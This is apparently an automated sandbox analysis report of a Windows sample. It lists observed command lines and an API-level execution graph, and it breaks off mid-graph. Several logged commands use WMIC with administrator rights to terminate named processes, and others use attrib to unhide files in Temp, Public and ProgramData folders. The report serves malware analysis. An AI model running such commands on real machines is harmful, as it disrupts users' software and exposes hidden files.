                                                    Target ID:35
                                                    Start time:12:09:03
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline
                                                    Imagebase:0xc70000
                                                    File size:427'008 bytes
                                                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:36
                                                    Start time:12:09:03
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:findstr /i /c:"RtkAudio"
                                                    Imagebase:0x710000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:37
                                                    Start time:12:09:04
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio.exe%'" Call Terminate
                                                    Imagebase:0xc70000
                                                    File size:427'008 bytes
                                                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:38
                                                    Start time:12:09:04
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\wbem\WMIC.exe process where "name like '%IntelSvc.exe%'" Call Terminate
                                                    Imagebase:0xc70000
                                                    File size:427'008 bytes
                                                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:39
                                                    Start time:12:09:05
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\wbem\WMIC.exe process where "name like '%Systemfont.exe%'" Call Terminate
                                                    Imagebase:0xc70000
                                                    File size:427'008 bytes
                                                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:40
                                                    Start time:12:09:06
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate
                                                    Imagebase:0xc70000
                                                    File size:427'008 bytes
                                                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:41
                                                    Start time:12:09:06
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate
                                                    Imagebase:0xc70000
                                                    File size:427'008 bytes
                                                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:42
                                                    Start time:12:09:08
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate
                                                    Imagebase:0xc70000
                                                    File size:427'008 bytes
                                                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:43
                                                    Start time:12:09:08
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate
                                                    Imagebase:0xc70000
                                                    File size:427'008 bytes
                                                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:44
                                                    Start time:12:09:09
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate
                                                    Imagebase:0xc70000
                                                    File size:427'008 bytes
                                                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:46
                                                    Start time:12:09:11
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\*.*"
                                                    Imagebase:0x930000
                                                    File size:19'456 bytes
                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:47
                                                    Start time:12:09:11
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\*.*"
                                                    Imagebase:0x930000
                                                    File size:19'456 bytes
                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:48
                                                    Start time:12:09:11
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"
                                                    Imagebase:0x930000
                                                    File size:19'456 bytes
                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:49
                                                    Start time:12:09:11
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"
                                                    Imagebase:0x930000
                                                    File size:19'456 bytes
                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:50
                                                    Start time:12:09:11
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"
                                                    Imagebase:0x930000
                                                    File size:19'456 bytes
                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:77
                                                    Start time:12:09:12
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\System32\Conhost.exe
                                                    Wow64 process (32bit):
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:
                                                    Has administrator privileges:
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:203
                                                    Start time:12:09:29
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\System32\Conhost.exe
                                                    Wow64 process (32bit):
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:
                                                    Has administrator privileges:
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:2.5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:7.5%
                                                      Total number of Nodes:1917
                                                      Total number of Limit Nodes:7
                                                      execution_graph 5403 40eb42 memset GetClassNameA _strcmpi 5404 40eb93 EnumChildWindows 5403->5404 5405 40ebad 5403->5405 5404->5405 5406 407342 5407 40299d 6 API calls 5406->5407 5408 40735a 5407->5408 5409 40299d 6 API calls 5408->5409 5410 407366 5409->5410 5411 40299d 6 API calls 5410->5411 5412 40736e PostMessageA 5411->5412 5414 4076e8 5412->5414 4411 407443 4412 4076e8 4411->4412 4413 40745a 4411->4413 4415 407480 GetWindowRect GetParent 4413->4415 4419 40299d 4413->4419 4416 4074ba SetWindowPos 4415->4416 4417 4074ac MapWindowPoints 4415->4417 4416->4412 4417->4416 4421 4029b0 4419->4421 4420 402a13 atoi 4423 402a11 4420->4423 4421->4420 4422 4029be 4421->4422 4424 4029c3 memset 4422->4424 4425 402a08 4422->4425 4423->4413 4429 40223f strlen 4424->4429 4432 402640 strtoul 4425->4432 4428 4029f1 strtol 4428->4423 4430 402250 4429->4430 4431 402253 memcpy 4429->4431 4430->4431 4431->4428 4432->4423 5415 40e944 5422 40e8d5 RegCreateKeyExA 5415->5422 5417 40e95a 5418 40e983 5417->5418 5423 40e920 strlen RegSetValueExA 5417->5423 5420 40e972 RegCloseKey 5420->5418 5422->5417 5423->5420 4433 407645 4434 407646 4433->4434 4438 402a1d GetWindowLongA 4434->4438 4436 40765d InvalidateRect 4437 4076e8 4436->4437 4439 402a35 SetWindowLongA 4438->4439 4439->4436 4441 40fc46 4442 402269 3 API calls 4441->4442 4443 40fc5b 4442->4443 5424 406f48 5425 40736f PostMessageA 5424->5425 5426 4076e8 5425->5426 5427 407149 5428 40718d EnableWindow 5427->5428 5429 4076e8 5428->5429 5430 40354a memset strlen 5431 4035cd _mbscpy 5430->5431 5432 403597 5430->5432 5433 4021c8 2 API calls 5431->5433 5432->5431 5434 4035a8 strchr 5432->5434 5435 4035e6 _mbscat _mbscat 5433->5435 5434->5432 4444 40324b 4445 403258 FreeLibrary 4444->4445 4446 40325e LoadLibraryA 4444->4446 4445->4446 4447 403293 4446->4447 4448 40326f GetProcAddress 4446->4448 4449 403282 4448->4449 4450 403287 4448->4450 4450->4447 4451 40328d FreeLibrary 4450->4451 4451->4447 5436 410b4f 5437 410b62 _c_exit 5436->5437 5438 410b5b _exit 5436->5438 5439 410b68 5437->5439 5438->5437 4452 40a452 4453 40a0b3 GetLastError 4452->4453 4454 40a464 GetProcAddress 4452->4454 4460 4020ef 4453->4460 4457 40a473 FreeLibrary 4454->4457 4458 409895 4459 40a0fe 4459->4452 4461 402123 FormatMessageA 4460->4461 4462 40210c LoadLibraryExA 4460->4462 4464 402161 _mbscpy 4461->4464 4465 40213c strlen 4461->4465 4462->4461 4463 40211e 4462->4463 4463->4461 4466 402170 sprintf 4464->4466 4467 402156 LocalFree 4465->4467 4468 402149 _mbscpy 4465->4468 4466->4458 4466->4459 4467->4466 4468->4467 4469 409e53 4470 409cc8 4469->4470 4478 409e96 4469->4478 4470->4469 4474 409e77 4470->4474 4479 4059bd MessageBoxA 4470->4479 4483 40e6e6 4470->4483 4473 409eac 4475 409eb3 GetLastError 4473->4475 4476 409895 4473->4476 4474->4478 4501 40e8bc RegOpenKeyExA 4474->4501 4477 4020ef 6 API calls 4475->4477 4480 409ed3 sprintf 4477->4480 4502 40ea19 4478->4502 4479->4470 4480->4476 4482 409efd MessageBoxA 4480->4482 4482->4476 4484 40e6fe 4483->4484 4485 40e70d memset memcpy strlen 4484->4485 4488 40e88b 4484->4488 4486 40e7b3 _strcmpi 4485->4486 4487 40e743 strcmp 4485->4487 4486->4488 4489 40e7cb _strcmpi 4486->4489 4490 40e797 strcmp 4487->4490 4491 40e758 GetCurrentProcess GetModuleHandleA GetProcAddress 4487->4491 4488->4470 4489->4488 4493 40e7e3 _strcmpi 4489->4493 4490->4486 4492 40e780 4490->4492 4491->4492 4492->4486 4493->4488 4494 40e7fb _strcmpi 4493->4494 4494->4488 4495 40e813 _strcmpi 4494->4495 4495->4488 4496 40e827 _strcmpi 4495->4496 4496->4488 4497 40e83b _strcmpi 4496->4497 4497->4488 4498 40e84f _strcmpi 4497->4498 4498->4488 4499 40e863 _strcmpi 4498->4499 4499->4488 4500 40e877 _strcmpi 4499->4500 4500->4488 4501->4478 4509 40e8bc RegOpenKeyExA 4502->4509 4504 40ea34 4505 40ea55 4504->4505 4506 40ea3b RegDeleteValueA 4504->4506 4505->4473 4507 40ea4b 4506->4507 4508 40ea4c RegCloseKey 4506->4508 4507->4508 4508->4505 4509->4504 4510 406255 4535 40d92c GetCurrentProcess LoadLibraryA 4510->4535 4515 406297 4517 40629c FreeLibrary 4515->4517 4526 4062a5 4515->4526 4516 4062ac 4518 401337 4 API calls 4516->4518 4517->4526 4519 4062bd 4518->4519 4520 4062d6 4519->4520 4521 40637a memset CreateProcessA 4519->4521 4549 401309 4520->4549 4523 4063c4 4521->4523 4524 4063bb GetLastError 4521->4524 4523->4526 4527 4063c9 FreeLibrary 4523->4527 4524->4523 4527->4526 4528 406361 GetLastError 4529 40636a 4528->4529 4529->4523 4531 40636f FreeLibrary 4529->4531 4531->4523 4536 40d950 GetProcAddress 4535->4536 4537 40d976 GetLastError 4535->4537 4538 40d960 4536->4538 4539 40d96b FreeLibrary 4536->4539 4540 40627b 4537->4540 4538->4539 4539->4537 4541 40d97e 4539->4541 4546 401337 4540->4546 4558 40d8ad LoadLibraryA 4541->4558 4547 401372 4546->4547 4548 40133c LoadLibraryA GetProcAddress GetModuleHandleA GetProcAddress 4546->4548 4547->4515 4547->4516 4548->4547 4550 401269 5 API calls 4549->4550 4551 401311 4550->4551 4551->4528 4552 4044cf 4551->4552 4553 4044d8 LoadLibraryA GetProcAddress 4552->4553 4554 4044f9 memset 4552->4554 4553->4554 4555 401269 4554->4555 4556 4012b6 4555->4556 4557 40126f LoadLibraryA GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4555->4557 4556->4528 4556->4529 4557->4556 4559 40d8c2 GetProcAddress 4558->4559 4560 40d8e6 4558->4560 4561 40d8d2 4559->4561 4562 40d8df FreeLibrary 4559->4562 4563 40d8eb LoadLibraryA 4560->4563 4561->4562 4562->4560 4564 40d900 GetProcAddress 4563->4564 4565 40d927 GetLastError CloseHandle 4563->4565 4566 40d920 FreeLibrary 4564->4566 4567 40d910 4564->4567 4565->4540 4566->4565 4567->4566 4568 402057 4575 401baa 4568->4575 4570 40206b 4571 402085 GetObjectA GetDC CreateDIBitmap ReleaseDC OpenClipboard 4570->4571 4572 4020e7 4570->4572 4573 4020c8 EmptyClipboard SetClipboardData CloseClipboard 4571->4573 4574 4020dd DeleteObject 4571->4574 4573->4574 4574->4572 4576 401bb1 4575->4576 4577 401bb6 LoadLibraryA 4575->4577 4576->4570 4578 401c4b 4577->4578 4579 401bcb 10 API calls 4577->4579 4578->4570 4579->4578 4580 409a57 memset 4581 40531a 86 API calls 4580->4581 4582 409a81 WinExec 4581->4582 5440 402d57 EmptyClipboard 5441 402db3 CloseClipboard 5440->5441 5442 402d69 strlen GlobalAlloc 5440->5442 5443 402db1 5442->5443 5444 402d87 GlobalFix memcpy GlobalUnWire SetClipboardData 5442->5444 5443->5441 5444->5443 5445 40f559 memcpy 4583 40265c 4586 402640 strtoul 4583->4586 4585 402665 4586->4585 4587 40e25c 4588 40e268 memcpy 4587->4588 4589 40e289 4587->4589 4588->4589 5446 403b61 5452 403b78 5446->5452 5447 403c65 5448 4036b6 2 API calls 5447->5448 5449 403c70 5448->5449 5450 403bc1 _mbsicmp 5451 403be5 memset 5450->5451 5450->5452 5451->5452 5452->5447 5452->5450 5452->5451 5454 4036b6 GetModuleHandleA 5452->5454 5455 4036cb GetProcAddress 5454->5455 5456 4036db 5454->5456 5455->5456 5456->5452 5457 40af61 5458 40af77 5457->5458 5463 40e368 OpenProcess 5458->5463 5460 409895 5461 40af7d 5461->5460 5466 40e03d 5461->5466 5464 40e390 5463->5464 5465 40e37f TerminateProcess CloseHandle 5463->5465 5464->5461 5465->5464 5467 40e04a 5466->5467 5468 402423 GetVersionExA 5467->5468 5469 40e051 5468->5469 5471 40e067 memset 5469->5471 5477 40e0fd 5469->5477 5470 40e0f4 5470->5461 5472 40e09b 5471->5472 5472->5470 5473 40dda8 6 API calls 5472->5473 5478 40dc6c 5472->5478 5473->5472 5474 40e173 CloseHandle 5474->5470 5475 40e12f _mbscpy 5475->5477 5477->5470 5477->5474 5477->5475 5479 40dc90 _mbscpy 5478->5479 5480 40dc7f strchr 5478->5480 5483 40dd24 5479->5483 5480->5479 5482 40dc97 5480->5482 5484 4021ea 3 API calls 5482->5484 5483->5472 5485 40dca3 5484->5485 5485->5479 5486 40dcab memset 5485->5486 5487 40dce6 _mbscpy _mbscpy _mbscat 5486->5487 5488 40dcd9 GetWindowsDirectoryA 5486->5488 5487->5483 5488->5487 4590 402668 atoi 5497 40516e 5498 405182 GetModuleHandleA RegisterClassA CreateWindowExA 5497->5498 5499 4051e4 5497->5499 5498->5499 5500 408571 CoInitialize 5501 4085c7 5500->5501 5505 408590 5500->5505 5502 40860f 5501->5502 5504 40f511 3 API calls 5501->5504 5525 40ff77 5502->5525 5503 40299d 6 API calls 5503->5505 5506 4085d9 5504->5506 5505->5501 5505->5503 5508 4085f9 _strcmpi 5506->5508 5509 40299d 6 API calls 5506->5509 5508->5502 5510 408618 5508->5510 5511 4085f6 5509->5511 5512 40f511 3 API calls 5510->5512 5511->5508 5513 40861d 5512->5513 5520 40f529 MultiByteToWideChar 5513->5520 5514 408662 5516 408626 5517 40f511 3 API calls 5516->5517 5518 40862d 5517->5518 5521 40fd38 5518->5521 5520->5516 5522 40fd8b 5521->5522 5524 40fd44 5521->5524 5522->5502 5523 40fd51 _wcsicmp 5523->5524 5524->5522 5524->5523 5526 40ff8f 5525->5526 5528 40ff88 5525->5528 5527 40f511 3 API calls 5526->5527 5526->5528 5527->5528 5528->5514 4591 405072 LoadLibraryExA 4592 405089 GetProcAddress 4591->4592 4593 4050b8 4591->4593 4595 4050a6 FreeLibrary 4592->4595 4595->4593 5529 40a972 5530 40a992 5529->5530 5536 40a860 5529->5536 5531 40a81a memset 5533 402ad0 3 API calls 5531->5533 5532 40a92a 5532->5532 5533->5536 5534 40678b 50 API calls 5534->5536 5535 40a8aa SendInput 5535->5535 5535->5536 5536->5531 5536->5532 5536->5534 5536->5535 5537 40a8e1 SendInput 5536->5537 5538 402ad0 3 API calls 5536->5538 5537->5536 5537->5537 5538->5536 5539 408376 CoInitialize _strcmpi 5540 40839b 5539->5540 5542 40f511 3 API calls 5540->5542 5563 4083c1 5540->5563 5541 4083d9 _strcmpi 5544 4083ec 5541->5544 5545 4083ed _strcmpi 5541->5545 5543 4083a7 5542->5543 5564 40f529 MultiByteToWideChar 5543->5564 5544->5545 5547 408400 5545->5547 5548 408408 GetForegroundWindow 5547->5548 5550 408444 5547->5550 5552 408420 5548->5552 5553 408415 GetWindowThreadProcessId 5548->5553 5549 4083af 5554 40f511 3 API calls 5549->5554 5551 41040b 26 API calls 5550->5551 5555 408474 5550->5555 5551->5555 5565 41040b 5552->5565 5553->5552 5556 4083b6 5554->5556 5557 40fd38 _wcsicmp 5556->5557 5559 4083bd 5557->5559 5561 40299d 6 API calls 5559->5561 5559->5563 5560 40843b 5560->5555 5568 408338 GetForegroundWindow 5560->5568 5561->5563 5563->5541 5563->5550 5564->5549 5571 4100b2 5565->5571 5567 410420 5567->5560 5569 408354 GetWindowThreadProcessId EnumChildWindows 5568->5569 5570 40836e 5568->5570 5569->5570 5570->5550 5572 40dc41 15 API calls 5571->5572 5573 4100c1 5572->5573 5574 40f511 3 API calls 5573->5574 5575 4100e5 5573->5575 5576 4100c9 5573->5576 5574->5575 5575->5576 5578 410162 5575->5578 5579 41023c 5575->5579 5576->5567 5578->5576 5581 410036 5578->5581 5579->5576 5580 410036 9 API calls 5579->5580 5580->5579 5582 4100a7 5581->5582 5583 41004a 5581->5583 5582->5578 5583->5582 5584 41004f memset 5583->5584 5585 40dda8 6 API calls 5584->5585 5586 410074 5585->5586 5586->5582 5587 410080 _mbsicmp 5586->5587 5587->5582 5588 410091 5587->5588 5589 410098 _mbsicmp 5588->5589 5589->5582 5590 405b7d ??2@YAPAXI 5591 40e6d7 8 API calls 5590->5591 5593 405bb4 5591->5593 5592 405c09 ??3@YAXPAX 5593->5592 5594 405bdc _strcmpi 5593->5594 5595 405bfa 5593->5595 5594->5593 5594->5595 5595->5592 5596 40717e IsWindowEnabled 5597 40718d EnableWindow 5596->5597 5598 4076e8 5597->5598 5599 40f37f 5600 40f3bd 5599->5600 5601 40f38e Shell_NotifyIcon 5599->5601 5601->5600 4597 406c00 memset 4598 406c2c 4597->4598 4599 406c7a memset 4598->4599 4601 406c3e strlen 4598->4601 4600 404b83 2 API calls 4599->4600 4602 406ca6 4600->4602 4601->4599 4603 406c4a atoi 4601->4603 4605 406c67 4602->4605 4606 406ceb 4602->4606 4608 4021ea strlen strlen _memicmp 4602->4608 4609 404b83 2 API calls 4602->4609 4610 404b83 GetModuleHandleA 4603->4610 4605->4606 4607 406cf3 _mbscpy 4605->4607 4607->4606 4608->4602 4609->4602 4611 404ba5 4610->4611 4612 404b95 GetProcAddress 4610->4612 4611->4605 4612->4611 4613 401000 4614 40101a 4613->4614 4615 4011fc SetWindowTextA SetDlgItemTextA SetDlgItemTextA GetDlgItem 4613->4615 4616 401021 4614->4616 4617 401109 4614->4617 4645 402352 _mbscpy 4615->4645 4620 40102a 4616->4620 4621 4010cc GetDlgItem 4616->4621 4619 401116 4617->4619 4625 40113b 4617->4625 4623 401081 4619->4623 4624 40111f EndDialog DeleteObject 4619->4624 4626 401031 4620->4626 4627 401089 ChildWindowFromPoint GetDlgItem 4620->4627 4621->4623 4628 4010e3 SetBkMode SetTextColor GetSysColorBrush 4621->4628 4622 40123e CreateFontIndirectA SendMessageA 4646 40252e 6 API calls 4622->4646 4624->4623 4625->4623 4630 401152 MessageBoxA 4625->4630 4626->4623 4631 401039 ChildWindowFromPoint GetDlgItem 4626->4631 4627->4623 4632 4010b5 LoadCursorA SetCursor 4627->4632 4628->4623 4630->4623 4633 401182 memset GetWindowsDirectoryA 4630->4633 4631->4623 4634 401065 ShellExecuteA 4631->4634 4632->4623 4640 4021c8 strlen 4633->4640 4634->4623 4638 4011d3 CopyFileA 4638->4623 4639 4011eb MessageBoxA 4638->4639 4639->4623 4641 4021d3 4640->4641 4642 4011ba _mbscat 4640->4642 4641->4642 4643 4021da _mbscat 4641->4643 4644 4028de GetModuleFileNameA 4642->4644 4643->4642 4644->4638 4645->4622 4646->4623 4652 401a03 GetDlgItem SetFocus 5602 40f303 5603 40f341 Shell_NotifyIcon 5602->5603 5604 40f352 Shell_NotifyIcon 5602->5604 5605 40f37b 5603->5605 5604->5605 4653 407404 EnumChildWindows 4654 4076e8 4653->4654 5606 407f04 5625 402174 CreateFileA 5606->5625 5608 407f1a 5609 407f27 GetFileSize 5608->5609 5610 407feb GetLastError 5608->5610 5612 407fe0 CloseHandle 5609->5612 5613 407f42 ??2@YAPAXI ReadFile 5609->5613 5611 4020ef 6 API calls 5610->5611 5615 408005 sprintf 5611->5615 5614 408045 5612->5614 5616 407f63 5613->5616 5617 407f79 GetLastError 5613->5617 5615->5614 5620 408030 MessageBoxA 5615->5620 5626 4022c8 5616->5626 5619 4020ef 6 API calls 5617->5619 5622 407f96 sprintf 5619->5622 5620->5614 5623 407fd7 ??3@YAXPAX 5622->5623 5624 407fc0 MessageBoxA 5622->5624 5623->5612 5624->5623 5625->5608 5627 4022e7 5626->5627 5628 40230c memcpy 5627->5628 5629 40234b 5627->5629 5628->5627 5629->5623 4655 402805 strlen 4656 402819 4655->4656 4657 40281b ??2@YAPAXI 4655->4657 4658 40286a ??3@YAXPAX 4657->4658 4661 402830 4657->4661 4660 402877 4658->4660 4659 40283a strtoul 4659->4661 4661->4659 4662 402866 4661->4662 4662->4658 4662->4660 4663 40da05 GetModuleHandleA 4664 40da27 4663->4664 4665 40da17 GetProcAddress 4663->4665 4665->4664 5630 407105 5631 4075c4 SetFocus 5630->5631 5632 4076e8 5631->5632 5633 408307 GetWindowThreadProcessId 5634 408323 5633->5634 5635 408708 5636 408715 5635->5636 5650 403049 5636->5650 5639 4087b7 GetLastError 5641 4020ef 6 API calls 5639->5641 5640 40873b memset 5648 40875d 5640->5648 5642 4087d4 sprintf 5641->5642 5643 40879e 5642->5643 5644 4087fe MessageBoxA 5642->5644 5646 4087b0 5643->5646 5647 4087a7 ??3@YAXPAX 5643->5647 5644->5643 5647->5646 5648->5643 5661 40867b 5648->5661 5670 402a53 5648->5670 5674 402174 CreateFileA 5650->5674 5652 403056 5653 40305e GetFileSize 5652->5653 5655 40309a 5652->5655 5675 402f8c 5653->5675 5655->5639 5655->5640 5657 402f66 4 API calls 5658 403078 5657->5658 5678 4027e6 ReadFile 5658->5678 5660 403081 FindClose 5660->5655 5679 402e62 ??3@YAXPAX ??3@YAXPAX 5661->5679 5663 40869c memset 5666 4086ba 5663->5666 5664 402ad0 3 API calls 5664->5666 5665 4086f0 5668 408817 89 API calls 5665->5668 5666->5664 5666->5665 5667 402e88 7 API calls 5666->5667 5667->5666 5669 408701 5668->5669 5669->5648 5671 402a6a 5670->5671 5673 402a66 5670->5673 5672 402a95 memcpy 5671->5672 5671->5673 5672->5673 5673->5648 5674->5652 5676 402f92 ??3@YAXPAX 5675->5676 5677 402f9c 5675->5677 5676->5677 5677->5657 5678->5660 5679->5663 4666 40a812 4667 40a81a memset 4666->4667 4675 402ad0 4667->4675 4670 40a8aa SendInput 4670->4670 4671 40a860 4670->4671 4671->4667 4671->4670 4672 40a8e1 SendInput 4671->4672 4673 40a92a 4671->4673 4674 402ad0 3 API calls 4671->4674 4682 40678b strlen 4671->4682 4672->4671 4672->4672 4673->4673 4674->4671 4676 402aef 4675->4676 4679 402af6 4675->4679 4676->4671 4677 402b02 strchr 4677->4679 4678 402b2e strchr 4678->4679 4679->4677 4679->4678 4681 402b4a 4679->4681 4680 402b98 memcpy 4680->4676 4681->4676 4681->4680 4683 4067a0 4682->4683 4684 4067ce _strcmpi 4682->4684 4683->4684 4730 4067a8 4683->4730 4685 4067e6 _strcmpi 4684->4685 4684->4730 4686 406801 _strcmpi 4685->4686 4685->4730 4687 40681c _strcmpi 4686->4687 4686->4730 4688 406834 _strcmpi 4687->4688 4687->4730 4689 40684f _strcmpi 4688->4689 4688->4730 4690 40686a _strcmpi 4689->4690 4689->4730 4691 406882 _strcmpi 4690->4691 4690->4730 4692 40689d _strcmpi 4691->4692 4691->4730 4693 4068b8 _strcmpi 4692->4693 4692->4730 4694 4068d0 _strcmpi 4693->4694 4693->4730 4695 4068e8 _strcmpi 4694->4695 4694->4730 4696 406900 _strcmpi 4695->4696 4695->4730 4697 406918 _strcmpi 4696->4697 4696->4730 4698 406930 _strcmpi 4697->4698 4697->4730 4699 406948 _strcmpi 4698->4699 4698->4730 4700 406960 _strcmpi 4699->4700 4699->4730 4701 406978 _strcmpi 4700->4701 4700->4730 4702 406990 _strcmpi 4701->4702 4701->4730 4703 4069a8 _strcmpi 4702->4703 4702->4730 4704 4069c0 _strcmpi 4703->4704 4703->4730 4705 4069db _strcmpi 4704->4705 4704->4730 4706 4069f6 _strcmpi 4705->4706 4705->4730 4707 406a11 _strcmpi 4706->4707 4706->4730 4708 406a2c _strcmpi 4707->4708 4707->4730 4709 406a44 _strcmpi 4708->4709 4708->4730 4710 406a5c _strcmpi 4709->4710 4709->4730 4711 406a74 _strcmpi 4710->4711 4710->4730 4712 406a8c _strcmpi 4711->4712 4711->4730 4713 406aa4 _strcmpi 4712->4713 4712->4730 4714 406abc _strcmpi 4713->4714 4713->4730 4715 406ad4 _strcmpi 4714->4715 4714->4730 4716 406aec _strcmpi 4715->4716 4715->4730 4717 406b04 _strcmpi 4716->4717 4716->4730 4718 406b1c _strcmpi 4717->4718 4717->4730 4719 406b34 _strcmpi 4718->4719 4718->4730 4720 406b4c _strcmpi 4719->4720 4719->4730 4721 406b61 _strcmpi 4720->4721 4720->4730 4722 406b76 _strcmpi 4721->4722 4721->4730 4723 406b8b _strcmpi 4722->4723 4722->4730 4724 406ba3 _strcmpi 4723->4724 4723->4730 4725 406bbb _strcmpi 4724->4725 4724->4730 4726 406bd1 4725->4726 4725->4730 4727 406be5 4726->4727 4728 406bee atoi 4726->4728 4729 40299d 6 API calls 4727->4729 4728->4730 4729->4730 4730->4671 5680 404512 5681 410c10 5680->5681 5682 40451f 6 API calls 5681->5682 5683 4045e9 5682->5683 5684 4045cf MultiByteToWideChar 5682->5684 5685 404608 5683->5685 5686 4045ee MultiByteToWideChar 5683->5686 5684->5683 5687 404627 5685->5687 5688 